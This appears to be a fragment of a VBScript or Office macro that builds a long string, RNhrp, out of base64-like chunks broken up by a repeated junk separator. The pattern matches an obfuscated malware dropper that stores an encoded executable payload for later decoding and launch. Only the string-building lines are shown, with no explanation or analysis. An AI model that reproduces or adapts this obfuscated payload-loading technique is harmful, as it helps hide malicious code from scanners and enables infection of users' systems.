RNhrp = RNhrp & "DgBoFn0WBgCaFqI@@&&^%^#%BgC3Fic@@&&^%^#%"
RNhrp = RNhrp & "BgDSFvkWCg@@&&^%^#%JF4gC@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%BQC@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%E@@&&^%^#%@@&&^%^#%QC@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%R@@&&^%^#%@@&&^%^#%HQI@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%E0@@&&^%^#%@@&&^%^#%Q@@&&^%^#%B@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%3@@&&^%^#%kUCUQ@@&&^%"
RNhrp = RNhrp & "^#%B@@&&^%^#%@@&&^%^#%E@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%J4C"
RNhrp = RNhrp & "RQJV@@&&^%^#%@@&&^%^#%E@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%w@@&&^%^#%@@&&^%^#%@@&&^%^#%R@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%0@@&&^%^#%JF@@&&^%^#%k0@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%Q@@&&^%^#%F@@&&^%^#%@@&&^%^#%UB"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%Da@@&&^%^#%g@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%TQ@@&&^%^#%F@@&&^%^#%@@&&^%^#%w@"
RNhrp = RNhrp & "@&&^%^#%BQE@@&&^%^#%@@&&^%^#%OgC@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%BN@@&&^%^#%@@&&^%^#%U@@&&^%^#%"
RNhrp = RNhrp & "Gw@@&&^%^#%@@&&^%^#%@@&&^%^#%Q@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%wMN@@&&^%^#%00@@&&^%^#%"
RNhrp = RNhrp & "Bg@@&&^%^#%f@@&&^%^#%@@&&^%^#%@@&&^%^#%B"
RNhrp = RNhrp & "E@@&&^%^#%@@&&^%^#%g@@&&^%^#%0UCWQ@@&&^%"
RNhrp = RNhrp & "^#%I@@&&^%^#%CY@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%E@@&&^%^#%@@&&^%^#%FgDRQJN@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%k@@&&^%^#%LQ@@&&^%^#%B@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%awMB@@&&^%^#%E0@"
RNhrp = RNhrp & "@&&^%^#%CQ@@&&^%^#%v@@&&^%^#%@@&&^%^#%E@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%Bw@@&&^%^#%wE@"
RNhrp = RNhrp & "@&&^%^#%TQ@@&&^%^#%J@@&&^%^#%G@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%CwE@@&&^%^#%@@&&^%^#%HYD@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%Bd@@&&^%^#%@@&&^%^#%k@@&&^%^#%"
RNhrp = RNhrp & "gg@@&&^%^#%L@@&&^%^#%Q@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "l@@&&^%^#%M@@&&^%^#%@@&&^%^#%F0@@&&^%^#%"
RNhrp = RNhrp & "DQCC@@&&^%^#%DE@@&&^%^#%zgPp@@&&^%^#%DE@"
RNhrp = RNhrp & "@&&^%^#%5wPx@@&&^%^#%DE@@&&^%^#%+wP5@@&&"
RNhrp = RNhrp & "^%^#%DE@@&&^%^#%FQQB@@&&^%^#%SE@@&&^%^#%"
RNhrp = RNhrp & "Fgaq@@&&^%^#%RE@@&&^%^#%oQbY@@&&^%^#%RE@"
RNhrp = RNhrp & "@&&^%^#%rQbY@@&&^%^#%RE@@&&^%^#%qwf9@@&&"
RNhrp = RNhrp & "^%^#%QY@@&&^%^#%vRQ3B@@&&^%^#%Y@@&&^%^#%"
RNhrp = RNhrp & "yxQ3B@@&&^%^#%Y@@&&^%^#%2BSRB@@&&^%^#%Y@"
RNhrp = RNhrp & "@&&^%^#%4hSRB@@&&^%^#%Y@@&&^%^#%6xSRB@@&"
RNhrp = RNhrp & "&^%^#%Y@@&&^%^#%8RQIB@@&&^%^#%Y@@&&^%^#%"
RNhrp = RNhrp & "+xQIB@@&&^%^#%Y@@&&^%^#%@@&&^%^#%xUIB@@&"
RNhrp = RNhrp & "&^%^#%Y@@&&^%^#%CRWUB@@&&^%^#%Y@@&&^%^#%"
RNhrp = RNhrp & "DRWUB@@&&^%^#%Y@@&&^%^#%ERWUB@@&&^%^#%Y@"
RNhrp = RNhrp & "@&&^%^#%GRWUB@@&&^%^#%Y@@&&^%^#%IRWUB@@&"
RNhrp = RNhrp & "&^%^#%Y@@&&^%^#%LxWUB@@&&^%^#%Y@@&&^%^#%"
RNhrp = RNhrp & "PRWUB@@&&^%^#%Y@@&&^%^#%TRWUB@@&&^%^#%Y@"
RNhrp = RNhrp & "@&&^%^#%VRWXB@@&&^%^#%Y@@&&^%^#%YRWXB@@&"
RNhrp = RNhrp & "&^%^#%Y@@&&^%^#%bRU3B@@&&^%^#%Y@@&&^%^#%"
RNhrp = RNhrp & "dxU3B@@&&^%^#%Y@@&&^%^#%gBU3B@@&&^%^#%Y@"
RNhrp = RNhrp & "@&&^%^#%ihU3BF@@&&^%^#%g@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%@@&&^%^#%YYU@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%3@@&&^%^#%@@&&^%^#%E@@&&^%^#%"
RNhrp = RNhrp & "YC@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%g@"
RNhrp = RNhrp & "@&&^%^#%kwCo@@&&^%^#%+Q@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%QBwI@@&&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%GGF@@&&^%^#%@@&&^%^#%Nw@@&&^%"
RNhrp = RNhrp & "^#%B@@&&^%^#%I@@&&^%^#%g@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%uwPk@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%E@@&&^%^#%kC@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%ERgzB@@&"
RNhrp = RNhrp & "&^%^#%kB@@&&^%^#%QBIIQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "C@@&&^%^#%@@&&^%^#%TCDoELQEB@@&&^%^#%Fgh"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%BMI"
RNhrp = RNhrp & "VwQ3@@&&^%^#%QE@@&&^%^#%aCE@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%g@@&&^%^#%EwhnBDwB@@&&^%^#"
RNhrp = RNhrp & "%QB4IQ@@&&^%^#%@@&&^%^#%C@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%TCH@@&&^%^#%EQQEB@@&&^%^#%Igh@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%"
RNhrp = RNhrp & "g@@&&^%^#%RG@@&&^%^#%QE@@&&^%^#%kCE@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%kwCTBEYB"
RNhrp = RNhrp & "@@&&^%^#%QCQNQ@@&&^%^#%@@&&^%^#%C@@&&^%^"
RNhrp = RNhrp & "#%DG@@&&^%^#%r4EXgEB@@&&^%^#%KQ1@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%I@@&&^%^#%MYCxwRj@@&&"
RNhrp = RNhrp & "^%^#%QI@@&&^%^#%sDU@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%g@@&&^%^#%gwDTBGcB@@&&^%^#%gD@@&&^"
RNhrp = RNhrp & "%^#%NQ@@&&^%^#%@@&&^%^#%C@@&&^%^#%DG@@&&"
RNhrp = RNhrp & "^%^#%u@@&&^%^#%Eb@@&&^%^#%EC@@&&^%^#%Mw1"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%BE@"
RNhrp = RNhrp & "@&&^%^#%6QRw@@&&^%^#%QI@@&&^%^#%+DU@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%Q@@&&^%^#%gBYsB@@&&^%^#%w@@&&^%^#%INg@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%C@@&&^%^#%@@&&^%^#%GGF@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%Nw@@&&^%^#%E@@&&^%^#%Bg2"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@"
RNhrp = RNhrp & "@&&^%^#%N@@&&^%^#%WT@@&&^%^#%QQ@@&&^%^#%"
RNhrp = RNhrp & "KDY@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%"
RNhrp = RNhrp & "kwBmBZgBB@@&&^%^#%@@&&^%^#%8Ng@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%C@@&&^%^#%CT@@&&^%^#%HoFRgEE@@&&"
RNhrp = RNhrp & "^%^#%EQ2@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&"
RNhrp = RNhrp & "^%^#%JM@@&&^%^#%jgVG@@&&^%^#%QQ@@&&^%^#%"
RNhrp = RNhrp & "TDY@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%"
RNhrp = RNhrp & "kwCiBZ4BB@@&&^%^#%BcNg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "C@@&&^%^#%CT@@&&^%^#%LYFowEE@@&&^%^#%Gw2"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@"
RNhrp = RNhrp & "@&&^%^#%7gWT@@&&^%^#%QQ@@&&^%^#%fDY@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%kw@@&&^%"
RNhrp = RNhrp & "^#%CBuQ@@&&^%^#%B@@&&^%^#%CMNg@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%C@@&&^%^#%@@&&^%^#%DCEcEMgEE@@&&"
RNhrp = RNhrp & "^%^#%Mg2@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%YYU@@&&^%^#%@@&&^%^#%3@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%Q@@&&^%^#%5DY@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%g@@&&^%^#%kwBtBkYBB@@&&^%^"
RNhrp = RNhrp & "#%DsNg@@&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&"
RNhrp = RNhrp & "^%^#%IEGRgEE@@&&^%^#%Jgh@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%BMIvQbb@@&&^%^#%QQ@"
RNhrp = RNhrp & "@&&^%^#%1CE@@&&^%^#%@@&&^%^#%@@&&^%^#%g@"
RNhrp = RNhrp & "@&&^%^#%EwgIB+wBB@@&&^%^#%DgIQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%C@@&&^%^#%@@&&^%^#%TCDUH5@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%E@@&&^%^#%Owh@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%RweY@@&&"
RNhrp = RNhrp & "^%^#%QU@@&&^%^#%@@&&^%^#%CI@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%g@@&&^%^#%kwBqB6MBBQ@@&&^%"
RNhrp = RNhrp & "^#%QIg@@&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&"
RNhrp = RNhrp & "^%^#%H0HRgEF@@&&^%^#%Bgi@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%k@@&&^%^"
RNhrp = RNhrp & "#%dG@@&&^%^#%QU@@&&^%^#%ICI@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%g@@&&^%^#%ERgzB@@&&^%^#%kB"
RNhrp = RNhrp & "BQB@@&&^%^#%Ig@@&&^%^#%@@&&^%^#%C@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%GGF@@&&^%^#%@@&&^%^#%Nw@@&&^%"
RNhrp = RNhrp & "^#%F@@&&^%^#%F@@&&^%^#%i@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%BYIuwcB@@&&^%^#%gU@"
RNhrp = RNhrp & "@&&^%^#%XCI@@&&^%^#%@@&&^%^#%@@&&^%^#%g@"
RNhrp = RNhrp & "@&&^%^#%kwDHB5MBBQBsIg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "C@@&&^%^#%CT@@&&^%^#%PQHRgEF@@&&^%^#%HQi"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@"
RNhrp = RNhrp & "@&&^%^#%BwhG@@&&^%^#%QU@@&&^%^#%fCI@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%kw@@&&^%"
RNhrp = RNhrp & "^#%aCOQ@@&&^%^#%BQCMIg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "C@@&&^%^#%@@&&^%^#%TCDUI@@&&^%^#%QIF@@&&"
RNhrp = RNhrp & "^%^#%Jgi@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&"
RNhrp = RNhrp & "^%^#%JM@@&&^%^#%QggU@@&&^%^#%gU@@&&^%^#%"
RNhrp = RNhrp & "pCI@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%"
RNhrp = RNhrp & "BhhQ@@&&^%^#%Dc@@&&^%^#%BQC0Ig@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%C@@&&^%^#%@@&&^%^#%W@@&&^%^#%F4I"
RNhrp = RNhrp & "G@@&&^%^#%IF@@&&^%^#%P@@&&^%^#%n@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%"
RNhrp = RNhrp & "Z@@&&^%^#%nk@@&&^%^#%@@&&^%^#%g@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%Cg@@&&^%^#%@@&&^%^#%@@&&^%^#%g@"
RNhrp = RNhrp & "@&&^%^#%kwB3CW4CC@@&&^%^#%@@&&^%^#%QK@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&"
RNhrp = RNhrp & "^%^#%MgJF@@&&^%^#%II@@&&^%^#%Bwo@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%"
RNhrp = RNhrp & "+Ql7@@&&^%^#%gg@@&&^%^#%MCg@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%g@@&&^%^#%kw@@&&^%^#%ZCpMB"
RNhrp = RNhrp & "C@@&&^%^#%B@@&&^%^#%K@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%C@@&&^%^#%CT@@&&^%^#%D8KjQII@@&&"
RNhrp = RNhrp & "^%^#%Fgo@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&"
RNhrp = RNhrp & "^%^#%JM@@&&^%^#%WgqT@@&&^%^#%Qg@@&&^%^#%"
RNhrp = RNhrp & "aCg@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%"
RNhrp = RNhrp & "kwBtCpoCC@@&&^%^#%B8K@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%C@@&&^%^#%CT@@&&^%^#%I8KpQII@@&&"
RNhrp = RNhrp & "^%^#%JQo@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&"
RNhrp = RNhrp & "^%^#%JM@@&&^%^#%4Qqz@@&&^%^#%gg@@&&^%^#%"
RNhrp = RNhrp & "pCg@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%"
RNhrp = RNhrp & "kw@@&&^%^#%cC8ECC@@&&^%^#%CwK@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&^%^#%DcL"
RNhrp = RNhrp & "xwII@@&&^%^#%Mwo@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%I@@&&^%^#%JM@@&&^%^#%UQua@@&&^%^#%gg@"
RNhrp = RNhrp & "@&&^%^#%4Cg@@&&^%^#%@@&&^%^#%@@&&^%^#%g@"
RNhrp = RNhrp & "@&&^%^#%kwB3C94CC@@&&^%^#%D0K@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&^%^#%K0L"
RNhrp = RNhrp & "ewII@@&&^%^#%@@&&^%^#%gp@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%zQua@@&&"
RNhrp = RNhrp & "^%^#%gg@@&&^%^#%HCk@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%g@@&&^%^#%kwDgC3sCC@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%wKQ@@&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%EMewII@@&&^%^#%EQp@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%"
RNhrp = RNhrp & "Igz6@@&&^%^#%gg@@&&^%^#%VCk@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%g@@&&^%^#%kw@@&&^%^#%7D@@&"
RNhrp = RNhrp & "&^%^#%MDC@@&&^%^#%BsKQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "C@@&&^%^#%CT@@&&^%^#%FkMkwEI@@&&^%^#%Hwp"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@"
RNhrp = RNhrp & "@&&^%^#%egwX@@&&^%^#%wg@@&&^%^#%lCk@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%kwCWDOQ@"
RNhrp = RNhrp & "@&&^%^#%C@@&&^%^#%CkKQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "C@@&&^%^#%CT@@&&^%^#%K8MkwEI@@&&^%^#%LQp"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@"
RNhrp = RNhrp & "@&&^%^#%4@@&&^%^#%z6@@&&^%^#%gg@@&&^%^#%"
RNhrp = RNhrp & "xCk@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%"
RNhrp = RNhrp & "kwDzDJoCC@@&&^%^#%DYKQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "C@@&&^%^#%CT@@&&^%^#%@@&&^%^#%YNjQII@@&&"
RNhrp = RNhrp & "^%^#%P@@&&^%^#%p@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%I@@&&^%^#%JM@@&&^%^#%GQ2a@@&&^%^#%gg@"
RNhrp = RNhrp & "@&&^%^#%BCo@@&&^%^#%@@&&^%^#%@@&&^%^#%g@"
RNhrp = RNhrp & "@&&^%^#%kwBFDZMBC@@&&^%^#%@@&&^%^#%UKg@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&^%^#%FgN"
RNhrp = RNhrp & "5@@&&^%^#%@@&&^%^#%I@@&&^%^#%CQq@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%"
RNhrp = RNhrp & "hw0J@@&&^%^#%Qg@@&&^%^#%MCo@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%g@@&&^%^#%kwCsDUYDC@@&&^%^"
RNhrp = RNhrp & "#%BYKg@@&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&"
RNhrp = RNhrp & "^%^#%NYNkwEI@@&&^%^#%Ggq@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%9Q2T@@&&"
RNhrp = RNhrp & "^%^#%Qg@@&&^%^#%eCo@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%g@@&&^%^#%kw@@&&^%^#%pDo0CC@@&&^%^"
RNhrp = RNhrp & "#%CQKg@@&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&"
RNhrp = RNhrp & "^%^#%EMOmgII@@&&^%^#%KQq@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%Xg76@@&&"
RNhrp = RNhrp & "^%^#%gg@@&&^%^#%tCo@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%g@@&&^%^#%kwB+DqMBC@@&&^%^#%DEKg@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&^%^#%JIO"
RNhrp = RNhrp & "d@@&&^%^#%MI@@&&^%^#%Ngq@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%sQ57@@&&"
RNhrp = RNhrp & "^%^#%wg@@&&^%^#%/Co@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%g@@&&^%^#%kwDNDscCC@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%YKw@@&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&"
RNhrp = RNhrp & "^%^#%OEOkwEI@@&&^%^#%Cgr@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%Q+T@@&&^%^#%Qg@@&&^%^#%OCs@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%g@@&&^%^#%kw@@&&^%^#%mD5UD"
RNhrp = RNhrp & "C@@&&^%^#%BwKw@@&&^%^#%@@&&^%^#%C@@&&^%^"
RNhrp = RNhrp & "#%CT@@&&^%^#%EMPngEI@@&&^%^#%I@@&&^%^#%r"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@"
RNhrp = RNhrp & "@&&^%^#%c@@&&^%^#%9G@@&&^%^#%Qg@@&&^%^#%"
RNhrp = RNhrp & "iCs@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%"
RNhrp = RNhrp & "kwCDD0YBC@@&&^%^#%CQKw@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "C@@&&^%^#%@@&&^%^#%GGF@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "Nw@@&&^%^#%I@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%BFglg+0@@&&^%^#%wg@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%EWBpEMYDEg@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "g@@&&^%^#%@@&&^%^#%RYJ4QxgMU@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%C@@&&^%^#%@@&&^%^#%BFgzhDG@@&&^%^#%xY@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%I@@&&^%^#%@@&&^%^#%EWD0EMYD"
RNhrp = RNhrp & "G@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%RYCQRzQMa@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%BFgfBHY@@&&^%^#%x8@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%EWCzEeMDJ@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%g@@&&^%^#%@@&&^%^#%RYOsR6QMm@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%C@@&&^%^#%@@&&^%^#%BFgMBLy@@&&"
RNhrp = RNhrp & "^%^#%ys@@&&^%^#%oCs@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%g@@&&^%^#%FgBOEvcDL@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%8LQ@@&&^%^#%@@&&^%^#%C@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%R@@&&^%^#%GUSCwQt@@&&^%^#%C@@&&^%^#%0"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@"
RNhrp = RNhrp & "@&&^%^#%iBLk@@&&^%^#%DE@@&&^%^#%MDQ@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%kwCcEjoE"
RNhrp = RNhrp & "MQBEN@@&&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^"
RNhrp = RNhrp & "#%CT@@&&^%^#%LUSmgIx@@&&^%^#%Fg0@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%"
RNhrp = RNhrp & "yRLk@@&&^%^#%DE@@&&^%^#%aDQ@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%g@@&&^%^#%kwD0EgsEMQCEN@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%gTRgEy@@&&^%^#%Iw0@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%"
RNhrp = RNhrp & "HBNG@@&&^%^#%TI@@&&^%^#%lDQ@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%g@@&&^%^#%kw@@&&^%^#%wE5oC"
RNhrp = RNhrp & "MgCoN@@&&^%^#%@@&&^%^#%@@&&^%^#%C@@&&^%^"
RNhrp = RNhrp & "#%CT@@&&^%^#%EQTowEy@@&&^%^#%Lg0@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%"
RNhrp = RNhrp & "WBNLBDI@@&&^%^#%yDQ@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%g@@&&^%^#%kwBzE/oCMgDYN@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%C@@&&^%^#%CT@@&&^%^#%JUT"
RNhrp = RNhrp & "jQIy@@&&^%^#%P@@&&^%^#%0@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%I@@&&^%^#%JM@@&&^%^#%qRM6BDI@"
RNhrp = RNhrp & "@&&^%^#%BDU@@&&^%^#%@@&&^%^#%@@&&^%^#%g@"
RNhrp = RNhrp & "@&&^%^#%kwDSE1gEMg@@&&^%^#%QNQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%C@@&&^%^#%CT@@&&^%^#%O8TX@@&&^%^"
